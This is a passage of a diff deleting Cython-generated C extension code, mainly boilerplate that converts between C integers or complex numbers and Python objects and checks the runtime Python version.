b.real + lnr * b.imag; - z.real = z_r * cos(z_theta); - z.imag = z_r * sin(z_theta); - return z; - } - #endif -#endif - -/* FromPy */ -static __pyx_t_double_complex __Pyx_PyComplex_As___pyx_t_double_complex(PyObject* o) { - Py_complex cval; -#if !CYTHON_COMPILING_IN_PYPY - if (PyComplex_CheckExact(o)) - cval = ((PyComplexObject *)o)->cval; - else -#endif - cval = PyComplex_AsCComplex(o); - return __pyx_t_double_complex_from_parts( - (double)cval.real, - (double)cval.imag); -} - -/* CIntToPy */ -static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic push -#pragma GCC diagnostic ignored "-Wconversion" -#endif - const long neg_one = (long) -1, const_zero = (long) 0; -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic pop -#endif - const int is_unsigned = neg_one > const_zero; - if (is_unsigned) { - if (sizeof(long) < sizeof(long)) { - return PyInt_FromLong((long) value); - } else if (sizeof(long) <= sizeof(unsigned long)) { - return PyLong_FromUnsignedLong((unsigned long) value); -#ifdef HAVE_LONG_LONG - } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { - return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); -#endif - } - } else { - if (sizeof(long) <= sizeof(long)) { - return PyInt_FromLong((long) value); -#ifdef HAVE_LONG_LONG - } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { - return PyLong_FromLongLong((PY_LONG_LONG) value); -#endif - } - } - { - int one = 1; int little = (int)*(unsigned char *)&one; - unsigned char *bytes = (unsigned char *)&value; -#if !CYTHON_COMPILING_IN_LIMITED_API - return _PyLong_FromByteArray(bytes, sizeof(long), - little, !is_unsigned); -#else - PyObject *from_bytes, *result = NULL; - PyObject *py_bytes = NULL, *arg_tuple = NULL, *kwds = NULL, *order_str = NULL; - from_bytes = PyObject_GetAttrString((PyObject*)&PyInt_Type, "from_bytes"); - if (!from_bytes) return NULL; - py_bytes = PyBytes_FromStringAndSize((char*)bytes, sizeof(long)); - if (!py_bytes) goto limited_bad; - order_str = PyUnicode_FromString(little ? "little" : "big"); - if (!order_str) goto limited_bad; - arg_tuple = PyTuple_Pack(2, py_bytes, order_str); - if (!arg_tuple) goto limited_bad; - kwds = PyDict_New(); - if (!kwds) goto limited_bad; - if (PyDict_SetItemString(kwds, "signed", __Pyx_NewRef(!is_unsigned ? Py_True : Py_False))) goto limited_bad; - result = PyObject_Call(from_bytes, arg_tuple, kwds); - limited_bad: - Py_XDECREF(from_bytes); - Py_XDECREF(py_bytes); - Py_XDECREF(order_str); - Py_XDECREF(arg_tuple); - Py_XDECREF(kwds); - return result; -#endif - } -} - -/* FormatTypeName */ -#if CYTHON_COMPILING_IN_LIMITED_API -static __Pyx_TypeName -__Pyx_PyType_GetName(PyTypeObject* tp) -{ - PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, - __pyx_n_s_name); - if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { - PyErr_Clear(); - Py_XDECREF(name); - name = __Pyx_NewRef(__pyx_n_s__103); - } - return name; -} -#endif - -/* CIntFromPyVerify */ -#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ - __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) -#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ - __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) -#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ - {\ - func_type value = func_value;\ - if (sizeof(target_type) < sizeof(func_type)) {\ - if (unlikely(value != (func_type) (target_type) value)) {\ - func_type zero = 0;\ - if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ - return (target_type) -1;\ - if (is_unsigned && unlikely(value < zero))\ - goto raise_neg_overflow;\ - else\ - goto raise_overflow;\ - }\ - }\ - return (target_type) value;\ - } - -/* CIntFromPy */ -static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic push -#pragma GCC diagnostic ignored "-Wconversion" -#endif - const long neg_one = (long) -1, const_zero = (long) 0; -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic pop -#endif - const int is_unsigned = neg_one > const_zero; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_Check(x))) { - if ((sizeof(long) < sizeof(long))) { - __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) - } else { - long val = PyInt_AS_LONG(x); - if (is_unsigned && unlikely(val < 0)) { - goto raise_neg_overflow; - } - return (long) val; - } - } else -#endif - if (likely(PyLong_Check(x))) { - if (is_unsigned) { -#if CYTHON_USE_PYLONG_INTERNALS - if (unlikely(__Pyx_PyLong_IsNeg(x))) { - goto raise_neg_overflow; - } else if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_DigitCount(x)) { - case 2: - if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { - return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); - } - } - break; - case 3: - if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { - return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); - } - } - break; - case 4: - if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { - return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); - } - } - break; - } - } -#endif -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 - if (unlikely(Py_SIZE(x) < 0)) { - goto raise_neg_overflow; - } -#else - { - int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (long) -1; - if (unlikely(result == 1)) - goto raise_neg_overflow; - } -#endif - if ((sizeof(long) <= sizeof(unsigned long))) { - __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) -#endif - } - } else { -#if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_SignedDigitCount(x)) { - case -2: - if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { - return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case 2: - if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { - return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case -3: - if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { - return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case 3: - if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { - return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case -4: - if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { - return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - case 4: - if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { - return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); - } - } - break; - } - } -#endif - if ((sizeof(long) <= sizeof(long))) { - __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) -#endif - } - } - { - long val; - PyObject *v = __Pyx_PyNumber_IntOrLong(x); -#if PY_MAJOR_VERSION < 3 - if (likely(v) && !PyLong_Check(v)) { - PyObject *tmp = v; - v = PyNumber_Long(tmp); - Py_DECREF(tmp); - } -#endif - if (likely(v)) { - int ret = -1; -#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) - int one = 1; int is_little = (int)*(unsigned char *)&one; - unsigned char *bytes = (unsigned char *)&val; - ret = _PyLong_AsByteArray((PyLongObject *)v, - bytes, sizeof(val), - is_little, !is_unsigned); -#else - PyObject *stepval = NULL, *mask = NULL, *shift = NULL; - int bits, remaining_bits, is_negative = 0; - long idigit; - int chunk_size = (sizeof(long) < 8) ? 30 : 62; - if (unlikely(!PyLong_CheckExact(v))) { - PyObject *tmp = v; - v = PyNumber_Long(v); - assert(PyLong_CheckExact(v)); - Py_DECREF(tmp); - if (unlikely(!v)) return (long) -1; - } -#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if (Py_SIZE(x) == 0) - return (long) 0; - is_negative = Py_SIZE(x) < 0; -#else - { - int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (long) -1; - is_negative = result == 1; - } -#endif - if (is_unsigned && unlikely(is_negative)) { - goto raise_neg_overflow; - } else if (is_negative) { - stepval = PyNumber_Invert(v); - if (unlikely(!stepval)) - return (long) -1; - } else { - stepval = __Pyx_NewRef(v); - } - val = (long) 0; - mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; - shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; - for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { - PyObject *tmp, *digit; - digit = PyNumber_And(stepval, mask); - if (unlikely(!digit)) goto done; - idigit = PyLong_AsLong(digit); - Py_DECREF(digit); - if (unlikely(idigit < 0)) goto done; - tmp = PyNumber_Rshift(stepval, shift); - if (unlikely(!tmp)) goto done; - Py_DECREF(stepval); stepval = tmp; - val |= ((long) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if (Py_SIZE(stepval) == 0) - goto unpacking_done; - #endif - } - idigit = PyLong_AsLong(stepval); - if (unlikely(idigit < 0)) goto done; - remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); - if (unlikely(idigit >= (1L << remaining_bits))) - goto raise_overflow; - val |= ((long) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - unpacking_done: - #endif - if (!is_unsigned) { - if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) - goto raise_overflow; - if (is_negative) - val = ~val; - } - ret = 0; - done: - Py_XDECREF(shift); - Py_XDECREF(mask); - Py_XDECREF(stepval); -#endif - Py_DECREF(v); - if (likely(!ret)) - return val; - } - return (long) -1; - } - } else { - long val; - PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); - if (!tmp) return (long) -1; - val = __Pyx_PyInt_As_long(tmp); - Py_DECREF(tmp); - return val; - } -raise_overflow: - PyErr_SetString(PyExc_OverflowError, - "value too large to convert to long"); - return (long) -1; -raise_neg_overflow: - PyErr_SetString(PyExc_OverflowError, - "can't convert negative value to long"); - return (long) -1; -} - -/* CIntFromPy */ -static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic push -#pragma GCC diagnostic ignored "-Wconversion" -#endif - const int neg_one = (int) -1, const_zero = (int) 0; -#ifdef __Pyx_HAS_GCC_DIAGNOSTIC -#pragma GCC diagnostic pop -#endif - const int is_unsigned = neg_one > const_zero; -#if PY_MAJOR_VERSION < 3 - if (likely(PyInt_Check(x))) { - if ((sizeof(int) < sizeof(long))) { - __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) - } else { - long val = PyInt_AS_LONG(x); - if (is_unsigned && unlikely(val < 0)) { - goto raise_neg_overflow; - } - return (int) val; - } - } else -#endif - if (likely(PyLong_Check(x))) { - if (is_unsigned) { -#if CYTHON_USE_PYLONG_INTERNALS - if (unlikely(__Pyx_PyLong_IsNeg(x))) { - goto raise_neg_overflow; - } else if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_DigitCount(x)) { - case 2: - if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { - return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); - } - } - break; - case 3: - if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { - return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); - } - } - break; - case 4: - if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { - return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); - } - } - break; - } - } -#endif -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 - if (unlikely(Py_SIZE(x) < 0)) { - goto raise_neg_overflow; - } -#else - { - int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (int) -1; - if (unlikely(result == 1)) - goto raise_neg_overflow; - } -#endif - if ((sizeof(int) <= sizeof(unsigned long))) { - __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) -#endif - } - } else { -#if CYTHON_USE_PYLONG_INTERNALS - if (__Pyx_PyLong_IsCompact(x)) { - __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) - } else { - const digit* digits = __Pyx_PyLong_Digits(x); - assert(__Pyx_PyLong_DigitCount(x) > 1); - switch (__Pyx_PyLong_SignedDigitCount(x)) { - case -2: - if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { - return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case 2: - if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { - return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case -3: - if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { - return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case 3: - if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { - return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case -4: - if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { - return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - case 4: - if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { - if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { - __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) - } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { - return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); - } - } - break; - } - } -#endif - if ((sizeof(int) <= sizeof(long))) { - __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) -#ifdef HAVE_LONG_LONG - } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { - __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) -#endif - } - } - { - int val; - PyObject *v = __Pyx_PyNumber_IntOrLong(x); -#if PY_MAJOR_VERSION < 3 - if (likely(v) && !PyLong_Check(v)) { - PyObject *tmp = v; - v = PyNumber_Long(tmp); - Py_DECREF(tmp); - } -#endif - if (likely(v)) { - int ret = -1; -#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) - int one = 1; int is_little = (int)*(unsigned char *)&one; - unsigned char *bytes = (unsigned char *)&val; - ret = _PyLong_AsByteArray((PyLongObject *)v, - bytes, sizeof(val), - is_little, !is_unsigned); -#else - PyObject *stepval = NULL, *mask = NULL, *shift = NULL; - int bits, remaining_bits, is_negative = 0; - long idigit; - int chunk_size = (sizeof(long) < 8) ? 30 : 62; - if (unlikely(!PyLong_CheckExact(v))) { - PyObject *tmp = v; - v = PyNumber_Long(v); - assert(PyLong_CheckExact(v)); - Py_DECREF(tmp); - if (unlikely(!v)) return (int) -1; - } -#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if (Py_SIZE(x) == 0) - return (int) 0; - is_negative = Py_SIZE(x) < 0; -#else - { - int result = PyObject_RichCompareBool(x, Py_False, Py_LT); - if (unlikely(result < 0)) - return (int) -1; - is_negative = result == 1; - } -#endif - if (is_unsigned && unlikely(is_negative)) { - goto raise_neg_overflow; - } else if (is_negative) { - stepval = PyNumber_Invert(v); - if (unlikely(!stepval)) - return (int) -1; - } else { - stepval = __Pyx_NewRef(v); - } - val = (int) 0; - mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; - shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; - for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { - PyObject *tmp, *digit; - digit = PyNumber_And(stepval, mask); - if (unlikely(!digit)) goto done; - idigit = PyLong_AsLong(digit); - Py_DECREF(digit); - if (unlikely(idigit < 0)) goto done; - tmp = PyNumber_Rshift(stepval, shift); - if (unlikely(!tmp)) goto done; - Py_DECREF(stepval); stepval = tmp; - val |= ((int) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - if (Py_SIZE(stepval) == 0) - goto unpacking_done; - #endif - } - idigit = PyLong_AsLong(stepval); - if (unlikely(idigit < 0)) goto done; - remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); - if (unlikely(idigit >= (1L << remaining_bits))) - goto raise_overflow; - val |= ((int) idigit) << bits; - #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 - unpacking_done: - #endif - if (!is_unsigned) { - if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) - goto raise_overflow; - if (is_negative) - val = ~val; - } - ret = 0; - done: - Py_XDECREF(shift); - Py_XDECREF(mask); - Py_XDECREF(stepval); -#endif - Py_DECREF(v); - if (likely(!ret)) - return val; - } - return (int) -1; - } - } else { - int val; - PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); - if (!tmp) return (int) -1; - val = __Pyx_PyInt_As_int(tmp); - Py_DECREF(tmp); - return val; - } -raise_overflow: - PyErr_SetString(PyExc_OverflowError, - "value too large to convert to int"); - return (int) -1; -raise_neg_overflow: - PyErr_SetString(PyExc_OverflowError, - "can't convert negative value to int"); - return (int) -1; -} - -/* CheckBinaryVersion */ -static unsigned long __Pyx_get_runtime_version() { -#if __PYX_LIMITED_VERSION_HEX >= 0x030B00A4 - return Py_Version & ~0xFFUL; -#else - const char* rt_version = Py_GetVersion(); - unsigned long version = 0; - unsigned long factor = 0x01000000UL; - unsigned int digit = 0; - int i = 0; - while (factor) { - while ('0' <= rt_version[i] && rt_version[i] <= '9') { - digit = digit * 10 + (unsigned int) (rt_version[i] - '0'); - ++i; - } - version += factor * digit; - if (rt_version[i] != '.') - break; - digit = 0; - factor >>= 8; - ++i; - } - return version; -#endif -} -static int __Pyx_check_binary_version(unsigned long ct_version, unsigned long rt_version, int allow_newer) { - const unsigned long MAJOR_MINOR = 0xFFFF0000UL; - if ((rt_version & MAJOR_MINOR) == (ct_version & MAJOR_MINOR)) - return 0; - if (likely(allow_newer && (rt_version & MAJOR_MINOR) > (ct_version & MAJOR_MINOR))) - return 1; - { - char message[200]; - PyOS_snprintf(message, sizeof(message), - "compile time Python version %d.%d " - "of module '%.100s' " - "%s " - "runtime version %d.%d", - (int) (ct_version >> 24), (int) ((ct_version >> 16) & 0xFF), - __Pyx_MODULE_NAME, - (allow_newer) ? "was newer than" : "does not match", - (int) (rt_version >> 24), (int) ((rt_version >> 16) & 0xFF) - ); - return PyErr_WarnEx(NULL, message, 1); - } -} - -/* InitStrings */ -#if PY_MAJOR_VERSION >= 3 -static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { - if (t.is_unicode | t.is_str) { - if (t.intern) { - *str = PyUnicode_InternFromString(t.s); - } else if (t.encoding) { - *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); - } else { - *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); - } - } else { - *str = PyBytes_FromStringAndSize(t.s, t.n - 1); - } - if (!*str) - return -1; - if (PyObject_Hash(*str) == -1) - return -1; - return 0; -} -#endif -static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { - while (t->p) { - #if PY_MAJOR_VERSION >= 3 - __Pyx_InitString(*t, t->p); - #else - if (t->is_unicode) { - *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); - } else if (t->intern) { - *t->p = PyString_InternFromString(t->s); - } else { - *t->p = PyString_FromStringAndSize(t->s, t->n - 1); - } - if (!*t->p) - return -1; - if (PyObject_Hash(*t->p) == -1) - return -1; - #endif - ++t; - } - return 0; -} - -#include -static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s) { - size_t len = strlen(s); - if (unlikely(len > (size_t) PY_SSIZE_T_MAX)) { - PyErr_SetString(PyExc_OverflowError, "byte string is too long"); - return -1; - } - return (Py_ssize_t) len; -} -static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { - Py_ssize_t len = __Pyx_ssize_strlen(c_str); - if (unlikely(len < 0)) return NULL; - return __Pyx_PyUnicode_FromStringAndSize(c_str, len); -} -static CYTHON_INLINE PyObject* __Pyx_PyByteArray_FromString(const char* c_str) { - Py_ssize_t len = __Pyx_ssize_strlen(c_str); - if (unlikely(len < 0)) return NULL; - return PyByteArray_FromStringAndSize(c_str, len); -} -static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { - Py_ssize_t ignore; - return __Pyx_PyObject_AsStringAndSize(o, &ignore); -} -#if 